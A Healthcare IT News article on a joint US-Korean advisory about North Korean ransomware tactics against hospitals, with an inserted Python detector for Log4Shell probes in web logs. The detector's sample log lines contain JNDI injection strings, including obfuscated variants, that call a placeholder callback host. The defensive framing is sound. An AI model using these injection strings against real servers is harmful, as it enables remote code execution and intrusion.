
Healthcare systems may face new DPRK ransomware tactics



Government agencies from the United States and South Korea are highlighting newly observed ransomware tactics that they say are used to conceal the affiliation of North Korean hackers who are carrying out attacks against US and South Korean healthcare institutions and other critical infrastructure.

WHY IT MATTERS

The new Cybersecurity Advisory (CSA), Ransomware Attacks on Critical Infrastructure Fund North Korea’s Malicious Cyber Operations, details the tactics, techniques and procedures observed in recent DPRK ransomware activity, along with indicators of compromise.

The warning was issued yesterday by the U.S. National Security Agency, the Federal Bureau of Investigation, the Cybersecurity and Infrastructure Security Agency and the Department of Health and Human Services, together with the Republic of Korea’s National Intelligence Service and Defense Security Agency.

“In some cases, DPRK actors have portrayed themselves as other ransomware groups, such as the REvil ransomware group,” according to the agencies.

Agencies from both countries say that an unspecified amount of revenue from cryptocurrency ransoms supports North Korean government cyber operations targeting the U.S. and South Korean governments, including defense information networks.

Notably, North Korean cyber actors could threaten to disclose the proprietary data of a private healthcare company to competitors if the ransom is not paid.

The CSA provides the following key technical details and shares mitigation strategies:

  1. Acquire infrastructure – DPRK actors generate domains, personas and accounts, and identify cryptocurrency services to conduct their ransomware operations. Actors procure infrastructure, IP addresses and domains with cryptocurrency generated through illicit cybercrime, such as ransomware and cryptocurrency theft.
  2. Obfuscate identity – DPRK actors purposely obfuscate their involvement by operating with or under third-party foreign affiliate identities and by using third-party foreign intermediaries to receive ransom payments.
  3. Purchase VPNs and VPSs – DPRK cyber actors also use virtual private networks and virtual private servers, or third-country IP addresses, to appear to be coming from innocuous locations rather than from North Korea.
  4. Gain access – Actors use various exploits for common vulnerabilities and exposures (CVEs) to gain access and escalate privileges on networks. Recently observed CVEs that actors used to gain access include remote code execution in the Apache Log4j software library (known as Log4Shell) and remote code execution in unpatched SonicWall appliances.
  5. Move laterally and discover – After initial access, DPRK cyber actors use staged payloads with customized malware to perform additional reconnaissance and to upload and download files and executables. The staged malware is also responsible for collecting victim information and sending it to a remote host controlled by the actors.
  6. Employ various ransomware tools – Actors have used privately developed ransomware, such as Maui and H0lyGh0st, and have also been observed using or possessing publicly available tools for encryption, such as BitLocker, Deadbolt, ech0raix, GonnaCry, Hidden Tear, Jigsaw, LockBit 2.0, My Little Ransomware, NxRansomware, Ryuk and YourRansom.
  7. Demand ransom in cryptocurrency – DPRK cyber actors have been observed setting ransoms in bitcoin and are known to communicate with victims via Proton Mail email accounts.
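Step 4 names Log4Shell as an initial-access vector. The advisory's indicators are hashes and network artifacts, so the following is an added example, not part of the CSA or of this article: a small Python detector for Log4Shell probes in web server logs. It assumes Apache combined-log-format lines (the sample lines are constructed for this example and use documentation IP addresses), and it undoes the common lookup obfuscations (`${lower:j}`, `${::-j}`) before matching `${jndi:` so that the evasive forms seen in the wild are not missed. A hit means a probe reached the server, not a confirmed compromise; the follow-up check is whether the host made an outbound LDAP, RMI or DNS connection to the extracted callback host.

```python
import re

# Constructed sample access-log lines (not taken from the advisory).
# Lines 2, 3 and 5 carry Log4Shell probes; 3 and 5 use lookup obfuscation.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Feb/2023:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [12/Feb/2023:10:01:07 +0000] "GET /login HTTP/1.1" 200 900 "-" "${jndi:ldap://203.0.113.9:1389/a}"
10.0.0.7 - - [12/Feb/2023:10:02:15 +0000] "GET /api?x=${${lower:j}ndi:rmi://203.0.113.9/x} HTTP/1.1" 404 0 "-" "curl/7.68.0"
10.0.0.8 - - [12/Feb/2023:10:03:40 +0000] "GET /health HTTP/1.1" 200 12 "-" "kube-probe/1.25"
10.0.0.9 - - [12/Feb/2023:10:04:01 +0000] "POST /upload HTTP/1.1" 200 0 "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.9/z}" "Mozilla/5.0"
"""

# Log4j lookup forms attackers use to hide the literal string "jndi":
#   ${lower:j} / ${upper:J}        -> j
#   ${::-j} / ${env:NOPE:-j}       -> j   (default-value syntax)
OBFUSCATION = [
    re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.I),
    re.compile(r"\$\{(?:[a-z]+:)?(?:[^{}]*?):-([^{}]*)\}", re.I),
]

# After normalization, capture the JNDI scheme and the callback host.
JNDI = re.compile(r"\$\{jndi:([a-z]+):/*([^/:}\s]+)", re.I)


def normalize(s: str, max_rounds: int = 10) -> str:
    """Collapse nested lookup obfuscation so ${${lower:j}ndi:...} reads ${jndi:...}.

    Bounded to max_rounds so a hostile input cannot keep the loop busy.
    """
    for _ in range(max_rounds):
        new = s
        for pat in OBFUSCATION:
            new = pat.sub(r"\1", new)
        if new == s:
            break
        s = new
    return s


def find_log4shell_probes(log_text: str) -> list:
    """Return one dict per log line that contains a JNDI lookup, obfuscated or not."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = JNDI.search(normalize(line))
        if m:
            hits.append({
                "line": lineno,
                "src_ip": line.split(" ", 1)[0],   # first field of combined log format
                "scheme": m.group(1).lower(),
                "callback_host": m.group(2),
            })
    return hits


if __name__ == "__main__":
    for hit in find_log4shell_probes(SAMPLE_LOG):
        print(f"line {hit['line']}: probe from {hit['src_ip']} "
              f"via {hit['scheme']} to {hit['callback_host']}")
```

Run it against a real access log by replacing `SAMPLE_LOG` with the file contents; the callback hosts it prints are the values to pivot on in proxy and DNS logs, and any that resolve to the actor-controlled VPS ranges described in step 3 deserve a closer look than a generic scanner hit.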

THE LARGER TREND

In July 2022, CISA, the FBI and the Treasury Department issued a CSA warning that Maui ransomware was being used to target hospitals and public health agencies.

Officials said at the time: “Since May 2021, the FBI has observed and responded to multiple Maui ransomware incidents at HPH Sector organizations.”

“North Korean state-sponsored cyber actors used Maui ransomware in these incidents to encrypt servers responsible for healthcare services – including electronic health records services, diagnostics services, imaging services, and intranet services.”

Whether the attacker is an independent or a state-sponsored cybercriminal willing to jump from one ransomware group to another, a hospital’s financial ratings are vulnerable, according to a recent Fitch Ratings assessment.

Fitch analysts say the deployment of sophisticated cyber weapons that compromise healthcare delivery could affect a hospital’s finances and “could have a negative impact” on ratings.

ON THE RECORD

“This CSA complements previous reports on malicious cyber actor activities related to the DPRK’s ransomware campaigns, specifically Maui and H0lyGh0st ransomware,” the agencies said in the warning.

Andrea Fox is the senior editor of Healthcare IT News.
Email: [email protected]

Healthcare IT News is a publication of HIMSS Media.
